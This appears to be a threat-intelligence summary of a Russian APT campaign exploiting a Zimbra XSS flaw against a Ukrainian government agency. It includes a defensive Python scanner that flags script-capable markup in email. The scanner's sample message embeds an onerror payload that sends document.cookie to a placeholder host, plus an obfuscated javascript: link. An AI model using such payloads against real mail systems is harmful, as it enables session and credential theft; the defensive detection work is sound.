Russian APT Exploits Zimbra XSS to Target Ukrainian Government

Severity: High (Score: 78.0)

Sources: Cybersecuritynews, Scworld, Securityaffairs.Co, Escudodigital

Summary

A Russian state-linked advanced persistent threat (APT) has targeted a Ukrainian government agency through a cross-site scripting (XSS) vulnerability in the Zimbra Collaboration Suite, tracked as CVE-2025-66376. The campaign, named 'Operation GhostMail', delivers script inside HTML emails; the script executes when the message is rendered in the recipient's Zimbra webmail session and is used to extract credentials and sensitive data, leaving none of the dropped files or tooling that traditional indicators of compromise rely on. The vulnerability was published on January 5, 2026, and was added to the CISA Known Exploited Vulnerabilities catalog on March 18, 2026, confirming active exploitation. The campaign illustrates the growing sophistication of state-sponsored operations aimed at Ukraine amid ongoing geopolitical tensions, and its impact is significant because it compromises sensitive government communications.

Key Points:

  • A Russian APT exploits CVE-2025-66376, a critical XSS vulnerability in Zimbra.
  • Operation GhostMail targets Ukrainian government agencies via script embedded in HTML email.
  • Active exploitation was confirmed by CISA on March 18, 2026.
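Because the delivery vector is script carried inside an HTML mail body, a first triage step is to scan stored messages for HTML parts that could execute in a webmail client. The following is an added example written for this page; it is not Zimbra code, it does not reproduce the CVE-2025-66376 payload (which the page does not show), and it flags generic script carriers (script/iframe/object tags, on* event-handler attributes, javascript:/vbscript:/data: URLs in link and source attributes, CSS expression()). The sample .eml is constructed for the demonstration; the hostnames in it are placeholders.

```python
"""Triage helper: flag HTML e-mail parts that could execute script in webmail.

Added example for this page (not Zimbra's code, not the GhostMail payload).
It walks the MIME tree of a message, parses every text/html part and reports
constructs that a webmail client must strip before rendering.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

# Event-handler attributes (onload, onerror, onmouseover, ...) run script as
# soon as the element is rendered, no <script> tag required.
EVENT_HANDLER_RE = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# Schemes that execute or embed code when used in a URL attribute.  Control
# characters are stripped before matching because browsers accept
# "java<TAB>script:" and entity-encoded variants.
SCRIPT_SCHEME_RE = re.compile(r"^(javascript|vbscript|data):", re.IGNORECASE)
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "background"}
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class _Collector(HTMLParser):
    """Collects findings as 'kind:tag.attr' strings while parsing."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: attribute values are unescaped
        self.findings = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            if EVENT_HANDLER_RE.match(name):
                self.findings.append(f"attr:{tag}.{name}")
            elif name in URL_ATTRS:
                cleaned = re.sub(r"[\x00-\x20]", "", value)
                if SCRIPT_SCHEME_RE.match(cleaned):
                    self.findings.append(f"url:{tag}.{name}")
            elif name == "style" and "expression(" in value.lower():
                self.findings.append(f"style:{tag}")


def scan_html(html: str) -> list[str]:
    """Return the list of script-capable constructs found in an HTML fragment."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_message(raw: bytes) -> dict[int, list[str]]:
    """Map MIME part index (in msg.walk() order) to findings, html parts only."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = {}
    for idx, part in enumerate(msg.walk()):
        if part.get_content_type() != "text/html":
            continue
        findings = scan_html(part.get_content())
        if findings:
            results[idx] = findings
    return results


# Constructed sample message (not a real GhostMail lure): a benign text part
# plus an HTML part carrying an onerror handler and a tab-obfuscated
# javascript: link.  Hostnames are placeholders.
SAMPLE_EML = b"""\
From: sender@example.test
To: analyst@example.test
Subject: Quarterly hydrology report
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please see the attached report.
--b1
Content-Type: text/html; charset=utf-8

<html><body>
<p>Please see the attached report.</p>
<img src="x" onerror="fetch('https://collector.example.test/?c='+document.cookie)">
<a href="java&#x09;script:void(0)">open</a>
</body></html>
--b1--
"""

if __name__ == "__main__":
    for idx, findings in scan_message(SAMPLE_EML).items():
        print(f"part {idx}: {', '.join(findings)}")
```

Run against a mailbox export (one .eml per message) and treat any non-empty result as a candidate for manual review; the client-side sanitizer is the control that an XSS bug bypasses, so a hit here means the message reached storage with script-capable markup, not that it executed.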

Key Entities

  • Apt28 (apt_group)
  • BlueDelta (apt_group)
  • Fancy Bear (apt_group)
  • Sofacy Group (apt_group)
  • Strontium (apt_group)
  • Phishing (attack_type)
  • XSS (vulnerability)
  • Operation GhostMail (campaign)
  • State Hydrology Agency (company)
  • Russia (country)
  • Ukraine (country)
  • CVE-2025-66376 (cve)
  • Government (industry)
  • T1041 - Exfiltration Over C2 Channel (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • T1190 - Exploit Public-Facing Application (mitre_attack)
  • T1566 - Phishing (mitre_attack)
  • Zimbra Collaboration (platform)
  • Zimbra Collaboration Suite (platform)
  • Zimbra Webmail (platform)